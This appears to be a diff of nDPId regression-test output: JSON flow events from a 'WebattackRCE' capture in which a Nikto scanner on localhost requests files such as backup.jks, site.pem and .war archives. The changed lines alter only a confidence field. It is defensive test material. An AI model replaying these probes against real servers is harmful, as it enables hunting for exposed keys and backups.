+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 